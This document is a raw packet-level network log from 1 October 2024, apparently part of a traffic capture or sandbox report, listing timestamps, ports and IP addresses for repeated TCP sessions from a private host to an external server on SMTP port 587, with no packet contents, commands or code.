Oct 1, 2024 06:16:25.299762964 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:25.300168991 CEST	49762	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:25.305022955 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:25.463670015 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:25.463886023 CEST	49762	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:25.468753099 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:25.667737961 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:25.668010950 CEST	49762	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:25.672858000 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:25.829385042 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:25.829596996 CEST	49762	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:25.834436893 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:25.999787092 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:25.999963045 CEST	49762	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:26.005310059 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:26.162753105 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:26.163039923 CEST	49762	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:26.163078070 CEST	49762	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:26.163351059 CEST	49762	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:26.163388968 CEST	49762	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:26.163431883 CEST	49762	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:26.167958975 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:26.167990923 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:26.168294907 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:26.168456078 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:26.168524027 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:26.168550014 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:26.168576002 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:26.401002884 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:26.441579103 CEST	49762	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:27.912502050 CEST	49762	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:28.222805023 CEST	49762	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:28.263353109 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:28.263412952 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:28.420310020 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:28.420811892 CEST	49762	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:28.421664000 CEST	49763	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:28.426476955 CEST	587	49763	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:28.426562071 CEST	49763	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:29.002747059 CEST	587	49763	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:29.002916098 CEST	49763	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:29.007910013 CEST	587	49763	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:29.166764975 CEST	587	49763	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:29.166907072 CEST	49763	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:29.172298908 CEST	587	49763	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:29.332920074 CEST	587	49763	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:29.333507061 CEST	49763	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:29.338366032 CEST	587	49763	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:29.546981096 CEST	587	49763	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:29.547029972 CEST	587	49763	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:29.547064066 CEST	587	49763	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:29.547076941 CEST	49763	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:29.547100067 CEST	587	49763	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:29.547146082 CEST	49763	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:29.637422085 CEST	587	49763	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:29.638777971 CEST	49763	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:29.643606901 CEST	587	49763	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:29.803930044 CEST	587	49763	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:29.808002949 CEST	49763	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:29.812813044 CEST	587	49763	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:29.971798897 CEST	587	49763	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:29.972052097 CEST	49763	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:29.976931095 CEST	587	49763	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:30.137128115 CEST	587	49763	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:30.139576912 CEST	49763	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:30.144496918 CEST	587	49763	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:30.314253092 CEST	587	49763	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:30.315572023 CEST	49763	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:30.321017027 CEST	587	49763	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:30.486598969 CEST	587	49763	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:30.487571001 CEST	49763	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:30.492383003 CEST	587	49763	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:30.671283960 CEST	587	49763	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:30.675597906 CEST	49763	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:30.680511951 CEST	587	49763	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:30.840960979 CEST	587	49763	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:30.841227055 CEST	49763	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:30.841257095 CEST	49763	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:30.841280937 CEST	49763	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:30.841299057 CEST	49763	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:30.846101999 CEST	587	49763	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:30.846158981 CEST	587	49763	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:30.846321106 CEST	587	49763	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:30.846352100 CEST	587	49763	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:31.113229990 CEST	587	49763	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:31.160295010 CEST	49763	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:49.357677937 CEST	49763	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:49.363511086 CEST	587	49763	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:49.523261070 CEST	587	49763	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:49.523607969 CEST	49763	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:49.558427095 CEST	50419	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:49.563260078 CEST	587	50419	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:49.563348055 CEST	50419	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:50.205518007 CEST	587	50419	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:50.205693007 CEST	50419	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:50.210555077 CEST	587	50419	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:50.365411043 CEST	587	50419	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:50.365712881 CEST	50419	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:50.370482922 CEST	587	50419	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:50.527650118 CEST	587	50419	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:50.528032064 CEST	50419	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:50.532785892 CEST	587	50419	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:50.727045059 CEST	587	50419	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:50.727062941 CEST	587	50419	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:50.727077961 CEST	587	50419	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:50.727093935 CEST	587	50419	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:50.727128029 CEST	50419	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:50.727169037 CEST	50419	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:50.814495087 CEST	587	50419	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:50.817364931 CEST	50419	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:50.822146893 CEST	587	50419	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:50.978080034 CEST	587	50419	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:50.978779078 CEST	50419	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:50.983623981 CEST	587	50419	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:51.141590118 CEST	587	50419	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:51.141814947 CEST	50419	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:51.146631956 CEST	587	50419	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:51.325593948 CEST	587	50419	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:51.325843096 CEST	50419	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:51.332298040 CEST	587	50419	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:51.519134045 CEST	587	50419	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:51.519422054 CEST	50419	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:51.524260044 CEST	587	50419	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:51.679799080 CEST	587	50419	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:51.680078983 CEST	50419	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:51.684878111 CEST	587	50419	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:52.020966053 CEST	587	50419	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:52.021173000 CEST	50419	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:52.026026011 CEST	587	50419	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:52.180814028 CEST	587	50419	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:52.181179047 CEST	50419	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:52.181179047 CEST	50419	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:52.181179047 CEST	50419	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:52.181179047 CEST	50419	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:52.185976028 CEST	587	50419	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:52.185991049 CEST	587	50419	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:52.186158895 CEST	587	50419	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:52.186172009 CEST	587	50419	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:52.417983055 CEST	587	50419	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:52.418492079 CEST	50419	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:52.423284054 CEST	587	50419	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:52.592924118 CEST	587	50419	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:52.593311071 CEST	50419	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:52.594156027 CEST	50420	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:52.598947048 CEST	587	50420	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:52.599024057 CEST	50420	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:53.299773932 CEST	587	50420	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:53.299935102 CEST	50420	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:53.304759026 CEST	587	50420	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:53.463123083 CEST	587	50420	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:53.463287115 CEST	50420	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:53.468072891 CEST	587	50420	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:53.660953999 CEST	587	50420	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:53.661381006 CEST	50420	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:53.666131973 CEST	587	50420	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:53.868169069 CEST	587	50420	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:53.868187904 CEST	587	50420	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:53.868202925 CEST	587	50420	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:53.868217945 CEST	587	50420	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:53.868258953 CEST	50420	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:53.868272066 CEST	50420	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:53.954745054 CEST	587	50420	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:53.970952988 CEST	50420	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:53.975743055 CEST	587	50420	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:54.132966042 CEST	587	50420	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:54.136580944 CEST	50420	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:54.141443014 CEST	587	50420	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:54.301894903 CEST	587	50420	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:54.302330017 CEST	50420	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:54.307102919 CEST	587	50420	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:54.465507030 CEST	587	50420	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:54.465985060 CEST	50420	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:54.470756054 CEST	587	50420	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:54.687813997 CEST	587	50420	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:54.688040972 CEST	50420	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:54.692873955 CEST	587	50420	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:54.855026007 CEST	587	50420	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:54.857635021 CEST	50420	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:54.862461090 CEST	587	50420	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:55.035049915 CEST	587	50420	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:55.035258055 CEST	50420	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:55.040117025 CEST	587	50420	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:55.194927931 CEST	587	50420	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:55.195161104 CEST	50420	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:55.195199966 CEST	50420	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:55.195233107 CEST	50420	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:55.195244074 CEST	50420	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:55.199986935 CEST	587	50420	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:55.200014114 CEST	587	50420	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:55.200097084 CEST	587	50420	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:55.200110912 CEST	587	50420	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:55.431859970 CEST	587	50420	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:55.432313919 CEST	50420	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:55.437100887 CEST	587	50420	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:55.592428923 CEST	587	50420	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:55.592935085 CEST	50420	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:55.593681097 CEST	50421	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:55.598459005 CEST	587	50421	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:55.598541975 CEST	50421	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:56.166157961 CEST	587	50421	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:56.166368008 CEST	50421	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:56.171189070 CEST	587	50421	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:56.336234093 CEST	587	50421	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:56.336519957 CEST	50421	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:56.341291904 CEST	587	50421	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:56.499929905 CEST	587	50421	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:56.500509024 CEST	50421	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:56.505340099 CEST	587	50421	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:56.686757088 CEST	587	50421	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:56.686774015 CEST	587	50421	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:56.686788082 CEST	587	50421	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:56.686861992 CEST	50421	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:56.691750050 CEST	587	50421	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:56.691768885 CEST	587	50421	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:56.691792965 CEST	50421	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:56.693875074 CEST	50421	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:56.698652029 CEST	587	50421	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:56.861037970 CEST	587	50421	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:56.862098932 CEST	50421	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:56.866911888 CEST	587	50421	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:57.024832010 CEST	587	50421	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:57.025099039 CEST	50421	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:57.029889107 CEST	587	50421	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:57.188993931 CEST	587	50421	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:57.189337015 CEST	50421	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:57.194166899 CEST	587	50421	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:57.368865013 CEST	587	50421	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:57.369308949 CEST	50421	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:57.374094009 CEST	587	50421	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:57.532330990 CEST	587	50421	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:57.532751083 CEST	50421	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:57.537585020 CEST	587	50421	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:57.707071066 CEST	587	50421	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:57.707339048 CEST	50421	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:57.712188005 CEST	587	50421	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:57.869741917 CEST	587	50421	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:57.869998932 CEST	50421	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:57.870032072 CEST	50421	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:57.870050907 CEST	50421	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:57.870074987 CEST	50421	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:57.874816895 CEST	587	50421	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:57.875000954 CEST	587	50421	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:58.128444910 CEST	587	50421	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:58.129101992 CEST	50421	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:58.133842945 CEST	587	50421	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:58.293730974 CEST	587	50421	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:58.294123888 CEST	50421	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:58.295022964 CEST	50422	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:58.299784899 CEST	587	50422	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:58.299860954 CEST	50422	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:58.874366045 CEST	587	50422	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:58.874531984 CEST	50422	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:58.879326105 CEST	587	50422	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:59.038213968 CEST	587	50422	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:59.044905901 CEST	50422	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:59.049829006 CEST	587	50422	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:59.210656881 CEST	587	50422	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:59.211026907 CEST	50422	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:59.215888023 CEST	587	50422	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:59.418081045 CEST	587	50422	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:59.418096066 CEST	587	50422	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:59.418107986 CEST	587	50422	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:59.418123007 CEST	587	50422	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:59.418133974 CEST	587	50422	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:59.418160915 CEST	50422	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:59.418193102 CEST	50422	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:59.419667959 CEST	50422	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:59.424401999 CEST	587	50422	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:59.916663885 CEST	587	50422	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:59.917572021 CEST	50422	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:59.922337055 CEST	587	50422	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:00.080060005 CEST	587	50422	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:00.080378056 CEST	50422	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:00.085228920 CEST	587	50422	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:00.243158102 CEST	587	50422	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:00.243463993 CEST	50422	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:00.248198986 CEST	587	50422	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:00.418121099 CEST	587	50422	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:00.419244051 CEST	50422	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:00.424062967 CEST	587	50422	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:00.581466913 CEST	587	50422	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:00.581739902 CEST	50422	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:00.586488008 CEST	587	50422	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:00.767796040 CEST	587	50422	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:00.767993927 CEST	50422	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:00.772829056 CEST	587	50422	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:00.930361032 CEST	587	50422	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:00.930646896 CEST	50422	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:00.930677891 CEST	50422	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:00.930701971 CEST	50422	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:00.930716991 CEST	50422	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:00.935781002 CEST	587	50422	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:00.935790062 CEST	587	50422	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:00.935797930 CEST	587	50422	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:00.935801983 CEST	587	50422	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:01.183221102 CEST	587	50422	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:01.183862925 CEST	50422	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:01.188740015 CEST	587	50422	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:01.347465038 CEST	587	50422	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:01.348174095 CEST	50422	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:01.348906994 CEST	50423	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:01.353739977 CEST	587	50423	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:01.355473995 CEST	50423	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:01.936018944 CEST	587	50423	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:01.936180115 CEST	50423	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:01.940965891 CEST	587	50423	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:02.102893114 CEST	587	50423	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:02.103035927 CEST	50423	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:02.108007908 CEST	587	50423	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:02.270541906 CEST	587	50423	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:02.270868063 CEST	50423	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:02.275762081 CEST	587	50423	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:02.480098009 CEST	587	50423	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:02.480118036 CEST	587	50423	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:02.480139971 CEST	587	50423	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:02.480155945 CEST	587	50423	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:02.480168104 CEST	587	50423	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:02.480201960 CEST	50423	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:02.480240107 CEST	50423	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:02.572472095 CEST	587	50423	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:02.573892117 CEST	50423	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:02.578643084 CEST	587	50423	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:02.742886066 CEST	587	50423	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:02.743622065 CEST	50423	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:02.748351097 CEST	587	50423	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:02.910700083 CEST	587	50423	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:02.911025047 CEST	50423	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:02.915730000 CEST	587	50423	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:03.084207058 CEST	587	50423	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:03.084886074 CEST	50423	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:03.089601040 CEST	587	50423	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:03.283687115 CEST	587	50423	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:03.286232948 CEST	50423	587	192.168.2.4	198.54.114.247
